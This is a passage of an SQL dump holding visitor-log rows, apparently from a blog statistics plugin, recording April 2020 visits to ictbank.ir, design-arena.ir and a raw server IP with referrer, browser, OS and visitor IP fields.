(1714,'2020-04-05','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','46.101.80.192','000',0,1,0),
(1715,'2020-04-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','212.129.41.188','000',0,1,0),
(1716,'2020-04-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.92.202','000',0,1,0),
(1717,'2020-04-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.214.184.53','000',0,1,0),
(1718,'2020-04-06','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','103.82.235.2','000',0,1,0),
(1719,'2020-04-06','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','89.163.239.216','000',0,1,0),
(1720,'2020-04-06','http://ictbank.ir/blog','Chrome','OS X','10.8.2',NULL,NULL,'','87.118.116.90','000',0,2,0),
(1721,'2020-04-06','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','51.68.201.115','000',0,3,0),
(1722,'2020-04-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,3,0),
(1723,'2020-04-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(1724,'2020-04-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.148.87','000',0,1,0),
(1725,'2020-04-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(1726,'2020-04-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.224.89','000',0,1,0),
(1727,'2020-04-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(1728,'2020-04-06','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','134.209.245.211','000',0,1,0),
(1729,'2020-04-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(1730,'2020-04-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(1731,'2020-04-07','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(1732,'2020-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.108.38','000',0,1,0),
(1733,'2020-04-07','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','92.118.45.116','000',0,1,0),
(1734,'2020-04-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','96.126.103.73','000',0,1,0),
(1735,'2020-04-07','http://design-arena.ir','Chrome','Windows','10.0',NULL,NULL,'','198.15.211.3','000',0,1,0),
(1736,'2020-04-07','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','198.15.211.4','000',0,1,0),
(1737,'2020-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.80.185','000',0,1,0),
(1738,'2020-04-07','http://design-arena.ir/blog/','Opera','Windows','6.1',NULL,NULL,'','109.248.48.113','000',0,3,0),
(1739,'2020-04-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.8.110.129','000',0,3,0),
(1740,'2020-04-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(1741,'2020-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.12.160','000',0,1,0),
(1742,'2020-04-07','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','86.88.247.243','000',0,1,0),
(1743,'2020-04-07','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','47.95.248.37','000',0,1,0),
(1744,'2020-04-07','http://82.102.9.14:80','Internet Explorer','Windows','6.1',NULL,NULL,'','222.93.201.34','000',0,1,0),
(1745,'2020-04-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.30','000',0,1,0),
(1746,'2020-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.248.74','000',0,1,0),
(1747,'2020-04-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(1748,'2020-04-07','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.162','000',0,1,0),
(1749,'2020-04-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.53.88.40','000',0,1,0),
(1750,'2020-04-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','212.129.41.188','000',0,1,0),
(1751,'2020-04-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.53.88.40','000',0,1,0),
(1752,'2020-04-08','https://google.com/search?p=6808959286000&gags=8','Firefox','Windows','28.2',NULL,NULL,'','145.249.106.237','000',0,1,0),
(1753,'2020-04-08','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.220.101.197','000',0,3,0),
(1754,'2020-04-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','192.68.11.219','000',0,3,0),
(1755,'2020-04-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,3,0),
(1756,'2020-04-08','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.229.129.100','000',0,3,0),
(1757,'2020-04-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','114.67.84.151','000',0,1,0),
(1758,'2020-04-08','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','103.82.235.2','000',0,1,0),
(1759,'2020-04-08','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','39.104.169.255','000',0,2,0),
(1760,'2020-04-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.215.175','000',0,1,0),
(1761,'2020-04-08','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','119.23.188.20','000',0,1,0),
(1762,'2020-04-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(1763,'2020-04-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.165.36','000',0,1,0),
(1764,'2020-04-08','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','47.98.160.150','000',0,1,0),
(1765,'2020-04-08','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','47.98.203.37','000',0,1,0),
(1766,'2020-04-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(1767,'2020-04-08','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','120.27.199.232','000',0,1,0),
(1768,'2020-04-08','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','188.68.47.54','000',0,1,0),
(1769,'2020-04-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.56.169','000',0,1,0),
(1770,'2020-04-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.58.202.100','000',0,1,0),
(1771,'2020-04-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(1772,'2020-04-08','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','47.90.127.57','000',0,1,0),
(1773,'2020-04-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.139','000',0,1,0),
(1774,'2020-04-08','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','123.57.48.144','000',0,1,0),
(1775,'2020-04-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(1776,'2020-04-08','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','47.94.237.120','000',0,1,0),
(1777,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','47.105.163.109','000',0,1,0),
(1778,'2020-04-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.100.87.190','000',0,1,0),
(1779,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','39.105.11.124','000',0,1,0),
(1780,'2020-04-09','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','202.102.90.226','000',0,2,0),
(1781,'2020-04-09','http://ictbank.ir/blog','Internet Explorer','Windows','6.2',NULL,NULL,'','91.144.188.151','000',0,1,0),
(1782,'2020-04-09','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','45.13.249.189','000',0,1,0),
(1783,'2020-04-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.50.130.112','000',0,2,0),
(1784,'2020-04-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(1785,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','103.200.22.217','000',0,1,0),
(1786,'2020-04-09','http://webmail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.140','000',0,1,0),
(1787,'2020-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.139','000',0,1,0),
(1788,'2020-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.142','000',0,1,0),
(1789,'2020-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.123.223','000',0,1,0),
(1790,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','120.79.170.229','000',0,1,0),
(1791,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','120.76.220.115','000',0,1,0),
(1792,'2020-04-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.62.32.203','000',0,1,0),
(1793,'2020-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.29.154','000',0,1,0),
(1794,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','212.48.72.62','000',0,1,0),
(1795,'2020-04-09','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','112.17.250.35','000',0,3,0),
(1796,'2020-04-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(1797,'2020-04-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.173.147.20','000',0,1,0),
(1798,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','120.79.219.147','000',0,1,0),
(1799,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.91.157.10','000',0,1,0),
(1800,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','139.99.8.31','000',0,1,0),
(1801,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','109.228.12.76','000',0,1,0),
(1802,'2020-04-09','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','58.87.126.26','000',0,3,0),
(1803,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','80.82.115.2','000',0,1,0),
(1804,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','185.50.198.186','000',0,1,0),
(1805,'2020-04-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.140.203','000',0,1,0),
(1806,'2020-04-09','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','94.26.137.141','000',0,1,0),
(1807,'2020-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.196.236','000',0,1,0),
(1808,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','46.183.8.148','000',0,1,0),
(1809,'2020-04-09','https://google.com/search?p=3198055591205&gags=20','Firefox','Windows','8.2',NULL,NULL,'','66.45.255.169','000',0,1,0),
(1810,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','101.37.244.107','000',0,1,0),
(1811,'2020-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.238.196','000',0,1,0),
(1812,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','47.90.127.57','000',0,1,0),
(1813,'2020-04-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.250','000',0,1,0),
(1814,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','112.74.41.9','000',0,1,0),
(1815,'2020-04-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(1816,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','119.23.131.91','000',0,1,0),
(1817,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','120.78.156.82','000',0,1,0),
(1818,'2020-04-09','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','39.108.102.75','000',0,1,0),
(1819,'2020-04-10','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','139.99.8.31','000',0,1,0),
(1820,'2020-04-10','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','140.143.233.56','000',0,1,0),
(1821,'2020-04-10','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','91.109.15.60','000',0,1,0),
(1822,'2020-04-10','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','142.93.186.172','000',0,1,0),
(1823,'2020-04-10','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','94.138.208.146','000',0,1,0),
(1824,'2020-04-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.130.149','000',0,1,0),
(1825,'2020-04-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','106.14.227.131','000',0,1,0),
(1826,'2020-04-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.44.195','000',0,1,0),
(1827,'2020-04-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(1828,'2020-04-10','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','91.121.76.25','000',0,1,0),
(1829,'2020-04-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(1830,'2020-04-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(1831,'2020-04-10','http://ictbank.ir/blog','Samsung Internet','Android','7.0',NULL,NULL,'','5.236.167.101','000',0,2,0),
(1832,'2020-04-10','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.25','000',0,1,0),
(1833,'2020-04-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','93.174.95.106','000',0,1,0),
(1834,'2020-04-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.251.245','000',0,1,0),
(1835,'2020-04-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','180.95.238.97','000',0,1,0),
(1836,'2020-04-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.106.195','000',0,1,0),
(1837,'2020-04-10','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','47.98.207.111','000',0,1,0),
(1838,'2020-04-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(1839,'2020-04-10','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','182.92.217.173','000',0,3,0),
(1840,'2020-04-10','https://google.com/search?p=4870527217112&gags=8','Firefox','Windows','8.2',NULL,NULL,'','216.158.226.228','000',0,1,0),
(1841,'2020-04-10','https://google.com/search?p=1599772323449&gags=6','Firefox','Windows','3.2',NULL,NULL,'','66.23.231.220','000',0,1,0),
(1842,'2020-04-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.173.147.13','000',0,1,0),
(1843,'2020-04-11','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.162','000',0,1,0),
(1844,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.152.205','000',0,1,0),
(1845,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.236.39','000',0,1,0),
(1846,'2020-04-11','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','89.136.31.222','000',0,87,0),
(1847,'2020-04-11','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,2,0),
(1848,'2020-04-11','http://ictbank.ir/blog/','Chrome','Windows','6.2',NULL,NULL,'','82.102.9.14','000',0,1,0),
(1849,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.71.196.102','000',0,1,0),
(1850,'2020-04-11','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','122.51.78.20','000',0,2,0),
(1851,'2020-04-11','https://google.com/search?p=6022020638140&gags=5','Firefox','Windows','11.2',NULL,NULL,'','66.23.225.251','000',0,1,0),
(1852,'2020-04-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(1853,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.28.214.69','000',0,1,0),
(1854,'2020-04-11','https://google.com/search?p=9132522820084&gags=9','Firefox','Windows','21.2',NULL,NULL,'','66.23.231.220','000',0,1,0),
(1855,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.133','000',0,1,0),
(1856,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.139','000',0,2,0),
(1857,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.134','000',0,1,0),
(1858,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.138','000',0,1,0),
(1859,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.140','000',0,1,0),
(1860,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.24','000',0,2,0),
(1861,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.27','000',0,1,0),
(1862,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.26','000',0,1,0),
(1863,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.130','000',0,1,0),
(1864,'2020-04-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(1865,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.20','000',0,2,0),
(1866,'2020-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.23','000',0,1,0),
(1867,'2020-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.108.248','000',0,1,0),
(1868,'2020-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.135.211','000',0,1,0),
(1869,'2020-04-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','49.12.40.46','000',0,1,0),
(1870,'2020-04-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.42','000',0,1,0),
(1871,'2020-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.20.180','000',0,1,0),
(1872,'2020-04-12','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','217.12.221.24','000',0,1,0),
(1873,'2020-04-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(1874,'2020-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.21.111','000',0,1,0),
(1875,'2020-04-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(1876,'2020-04-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(1877,'2020-04-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.146.160.230','000',0,3,0),
(1878,'2020-04-12','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','141.101.143.20','000',0,59,0),
(1879,'2020-04-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(1880,'2020-04-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.66.204','000',0,2,0),
(1881,'2020-04-13','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(1882,'2020-04-13','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','121.201.20.201','000',0,3,0),
(1883,'2020-04-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.234.32','000',0,1,0),
(1884,'2020-04-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.217.184','000',0,1,0),
(1885,'2020-04-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.169.250','000',0,1,0),
(1886,'2020-04-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.22.199','000',0,1,0),
(1887,'2020-04-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.24.249','000',0,1,0),
(1888,'2020-04-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.50.130.112','000',0,1,0),
(1889,'2020-04-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(1890,'2020-04-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','84.17.25.191','000',0,1,0),
(1891,'2020-04-14','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(1892,'2020-04-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','5.164.24.192','000',0,1,0),
(1893,'2020-04-14','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','223.167.32.100','000',0,1,0),
(1894,'2020-04-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.247.203','000',0,1,0),
(1895,'2020-04-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.217.176','000',0,1,0),
(1896,'2020-04-14','http://ictbank.ir/blog/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','Edge','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,1,0),
(1897,'2020-04-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(1898,'2020-04-14','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','196.179.228.78','000',0,3,0),
(1899,'2020-04-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.66.204','000',0,1,0),
(1900,'2020-04-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(1901,'2020-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.101.51','000',0,1,0),
(1902,'2020-04-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','211.159.248.184','000',0,1,0),
(1903,'2020-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.202.242','000',0,1,0),
(1904,'2020-04-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.115.124.75','000',0,1,0),
(1905,'2020-04-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.115.124.9','000',0,1,0),
(1906,'2020-04-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(1907,'2020-04-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.115.124.74','000',0,2,0),
(1908,'2020-04-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.115.124.10','000',0,2,0),
(1909,'2020-04-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','123.59.62.241','000',0,1,0),
(1910,'2020-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.128.222','000',0,1,0),
(1911,'2020-04-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','202.43.114.124','000',0,1,0),
(1912,'2020-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(1913,'2020-04-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','106.13.140.170','000',0,1,0),
(1914,'2020-04-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.145.12.65','000',0,1,0),
(1915,'2020-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.104.37','000',0,1,0),
(1916,'2020-04-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(1917,'2020-04-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','31.193.130.46','000',0,1,0),
(1918,'2020-04-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.66.204','000',0,1,0),
(1919,'2020-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.42.114','000',0,1,0),
(1920,'2020-04-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.237.177.127','000',0,1,0),
(1921,'2020-04-15','http://www.ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','195.201.171.107','000',0,2,0),
(1922,'2020-04-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','113.204.232.85','000',0,1,0),
(1923,'2020-04-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.57.155','000',0,1,0),
(1924,'2020-04-16','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','165.227.39.250','000',0,1,0),
(1925,'2020-04-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.128.28','000',0,1,0),
(1926,'2020-04-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.115.124.10','000',0,1,0),
(1927,'2020-04-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.115.124.75','000',0,3,0),
(1928,'2020-04-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.192.160','000',0,1,0),
(1929,'2020-04-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','96.126.103.73','000',0,1,0),
(1930,'2020-04-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.55.110','000',0,1,0),
(1931,'2020-04-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.136.26.112','000',0,2,0),
(1932,'2020-04-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','27.115.124.9','000',0,2,0),
(1933,'2020-04-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','208.91.109.18','000',0,1,0),
(1934,'2020-04-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(1935,'2020-04-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(1936,'2020-04-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','14.177.235.133','000',0,1,0),
(1937,'2020-04-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.143.220.142','000',0,1,0),
(1938,'2020-04-16','http://ictbank.ir/blog','Chrome','Android','9',NULL,NULL,'','5.114.59.78','000',0,1,0),
